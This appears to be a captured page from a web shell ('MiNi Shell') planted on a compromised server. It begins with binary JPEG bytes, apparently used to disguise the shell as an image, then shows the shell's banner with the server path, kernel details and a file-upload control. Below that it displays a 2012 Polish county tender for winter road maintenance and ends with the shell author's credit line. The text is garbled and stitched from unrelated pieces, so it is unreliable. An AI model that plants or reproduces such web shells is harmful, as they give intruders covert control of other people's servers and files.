JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121017/404164-N-2012.html

<p class="kh_header"><b>Krapkowice: Zimowe utrzymanie dróg powiatowych w powiecie krapkowickim</b><br>
<b>Numer ogłoszenia: 404164 - 2012; data zamieszczenia: 17.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Krapkowicach , ul. Kilińskiego 1, 47-303 Krapkowice, woj. opolskie, tel. 77 4074300, faks 77 4074332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatkrapkowicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg powiatowych w powiecie krapkowickim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zimowe utrzymanie dróg powiatowych w powiecie krapkowickim w okresie do 30 kwietnia 2013 r. przy wykorzystaniu sprzętu i materiałów wykonawcy, z podziałem na zadania:
Zadanie Nr 1 - Gmina Zdzieszowice (częściowo Gmina Gogolin):
a)	długość dróg: 29,46 km
Zadania Nr 2 - Gmina Gogolin (częściowo Gmina Krapkowice) :
b)	długość dróg: 28,57 km
c)	płotki: 700 mb - 350 szt.
d)	siatka: 200 mb
e)	paliki 116 szt.
Zadanie Nr 3 - Gmina Walce i Gmina Strzeleczki (częściowo Gmina Krapkowice):
a)	długość dróg: 85,42 km
b)	siatka: 3.135 mb
c)	paliki 1.740 szt.
1.1.	Usługi polegać będą w szczególności na:
1.1.1.	odśnieżaniu dróg pługami
1.1.2.	odśnieżaniu dróg pługami z jednoczesnym zwalczaniem śliskości zimowej solarkami zainstalowanymi na skrzyni samochodu,
1.1.3.	zwalczaniu śliskości zimowej dróg na bieżąco w miarę zaistniałych potrzeb solarkami przy użyciu solanki lub soli z piaskiem,
1.1.4.	odśnieżaniu dróg ładowarkami,
1.1.5.	usuwaniu zwałowisk śnieżnych przy użyciu ładowarek,
1.1.6.	wywożeniu zalegającego śniegu wraz z załadunkiem z terenu miasta (wyłącznie na pisemne polecenie Zamawiającego),
1.1.7.	zamontowaniu w miejscach wyznaczonych przez Zamawiającego zasłon przeciwśnieżnych dostarczonych przez Wykonawcę (nie dot. zad. Nr 1),
1.1.8.	stałe monitorowanie ustawienia zasłon przeciwśnieżnych oraz ich bieżące prawidłowe utrzymanie (nie dot. zad. Nr 1),
1.1.9.	demontaż zasłon przeciwśnieżnych po wykonaniu usługi (nie dot. zad. Nr 1)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 3 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten (potencjał techniczny) zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował sprzętem umożliwiającym odśnieżanie dróg dla każdego z zadań oddzielnie (w przypadku składania oferty na więcej niż jedno zadanie wykazanie się posiadaniem sprzętu dla każdego zadania oddzielnie) tj. minimum:
Dla zadania Nr 1: pługopiaskarką szt. 1 oraz ładowarką szt. 1
Dla zadania Nr 2: pługopiaskarką szt. 1 oraz ładowarką szt. 1
Dla zadania Nr 3: pługopiaskarką szt. 2, ładowarką szt. 2 oraz nośnikiem z pługiem ciężkim czołowym szt. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 3 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, bądź sporządzonego przez notariusza odpisu lub wyciągu z tego dokumentu - jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany istotnych postanowień umowy mogą być inicjowane przez Zamawiającego lub przez Wykonawcę i dokonywane wyłącznie na zasadach określonych w ust. 2 - 8.
2.	Zmiany o których mowa w ust. 1 mogą dotyczyć:
1)	terminu realizacji zamówienia,
2)	warunków i terminów płatności,
3)	zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT,
4)	zmiany parametrów technicznych.
3.	Zmiany, o których mowa w ust. 2, mogą nastąpić jedynie w uzasadnionych przypadkach, w szczególności:
1)	w zakresie ust. 2 pkt 1) i 2) w przypadku wystąpienia siły wyższej, tj. katastrofa naturalna, strajk, pożar lub w przypadku przedłużenia terminu realizacji przedmiotu zamówienia z przyczyn nieprzewidzianych i niezależnych od Wykonawcy,
2)	w zakresie ust. 2  pkt 2) i 3) w przypadku zmian powszechnie obowiązujących przepisów prawa w trakcie realizacji umowy, w szczególności dotyczących przepisów podatkowych, np zmiany ustawowej stawki podatku VAT lub regulacji dot. wykorzystania środków budżetowych,
3)	w zakresie ust. 2  pkt 4) jeśli przyczyni się to do poprawy jakości zamówienia, przy czym zmiana ta nie spowoduje zwiększenia kosztów realizacji zamówienia.
4.	Warunkiem dokonania zmian, o których mowa w ust. 2, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego:
1)	opis propozycji zmiany,
2)	uzasadnienie zmiany,
3)	obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy,
5.	Dokonanie zmian wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatkrapkowicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Krapkowicach
ul. Kilińskiego 1
47-303 Krapkowice
pok. Nr 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2012 godzina 10:30, miejsce: Starostwo Powiatowe w Krapkowicach
ul. Kilińskiego 1
47-303 Krapkowice
Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie dróg powiatowych na terenie Gminy Zdzieszowice (częściowo Gmina Gogolin).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg powiatowych w powiecie krapkowickim w okresie do 30 kwietnia 2013 r. przy wykorzystaniu sprzętu i materiałów wykonawcy na terenie Gminy Zdzieszowice (częściowo Gmina Gogolin). Długość dróg: 29,46 km
1.2.1.	odśnieżaniu dróg pługami
1.2.2.	odśnieżaniu dróg pługami z jednoczesnym zwalczaniem śliskości zimowej solarkami zainstalowanymi na skrzyni samochodu,
1.2.3.	zwalczaniu śliskości zimowej dróg na bieżąco w miarę zaistniałych potrzeb solarkami przy użyciu solanki lub soli z piaskiem,
1.2.4.	odśnieżaniu dróg ładowarkami,
1.2.5.	usuwaniu zwałowisk śnieżnych przy użyciu ładowarek,
1.2.6.	wywożeniu zalegającego śniegu wraz z załadunkiem z terenu miasta (wyłącznie na pisemne polecenie Zamawiającego),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie dróg powiatowych na terenie Gminy Gogolin (częściowo Gmina Krapkowice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg powiatowych w powiecie krapkowickim w okresie do 30 kwietnia 2013 r. przy wykorzystaniu sprzętu i materiałów wykonawcy na terenie Gminy Gogolin (częściowo Gmina Krapkowice). 
Długość dróg: 29,46 km
płotki: 700 mb - 350 szt.
siatka: 200 mb
paliki 116 szt.
1.2.1.	odśnieżaniu dróg pługami
1.2.2.	odśnieżaniu dróg pługami z jednoczesnym zwalczaniem śliskości zimowej solarkami zainstalowanymi na skrzyni samochodu,
1.2.3.	zwalczaniu śliskości zimowej dróg na bieżąco w miarę zaistniałych potrzeb solarkami przy użyciu solanki lub soli z piaskiem,
1.2.4.	odśnieżaniu dróg ładowarkami,
1.2.5.	usuwaniu zwałowisk śnieżnych przy użyciu ładowarek,
1.2.6.	wywożeniu zalegającego śniegu wraz z załadunkiem z terenu miasta (wyłącznie na pisemne polecenie Zamawiającego),
1.2.7.	zamontowaniu w miejscach wyznaczonych przez Zamawiającego zasłon przeciwśnieżnych dostarczonych przez Wykonawcę (nie dot. zad. Nr 1),
1.2.8.	stałe monitorowanie ustawienia zasłon przeciwśnieżnych oraz ich bieżące prawidłowe utrzymanie (nie dot. zad. Nr 1),
1.2.9.	demontaż zasłon przeciwśnieżnych po wykonaniu usługi (nie dot. zad. Nr 1)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zimowe utrzymanie dróg powiatowych na terenie Gminy Walce i Gminy Strzeleczki (częściowo Gmina Krapkowice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg powiatowych w powiecie krapkowickim w okresie do 30 kwietnia 2013 r. przy wykorzystaniu sprzętu i materiałów wykonawcy na terenie Gminy Walce i Gminy Strzeleczki (częściowo Gmina Krapkowice). 
Długość dróg: 85,42 km
siatka: 3.135 mb
paliki 1.740 szt.
1.2.1.	odśnieżaniu dróg pługami
1.2.2.	odśnieżaniu dróg pługami z jednoczesnym zwalczaniem śliskości zimowej solarkami zainstalowanymi na skrzyni samochodu,
1.2.3.	zwalczaniu śliskości zimowej dróg na bieżąco w miarę zaistniałych potrzeb solarkami przy użyciu solanki lub soli z piaskiem,
1.2.4.	odśnieżaniu dróg ładowarkami,
1.2.5.	usuwaniu zwałowisk śnieżnych przy użyciu ładowarek,
1.2.6.	wywożeniu zalegającego śniegu wraz z załadunkiem z terenu miasta (wyłącznie na pisemne polecenie Zamawiającego),
1.2.7.	zamontowaniu w miejscach wyznaczonych przez Zamawiającego zasłon przeciwśnieżnych dostarczonych przez Wykonawcę (nie dot. zad. Nr 1),
1.2.8.	stałe monitorowanie ustawienia zasłon przeciwśnieżnych oraz ich bieżące prawidłowe utrzymanie (nie dot. zad. Nr 1),
1.2.9.	demontaż zasłon przeciwśnieżnych po wykonaniu usługi (nie dot. zad. Nr 1)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com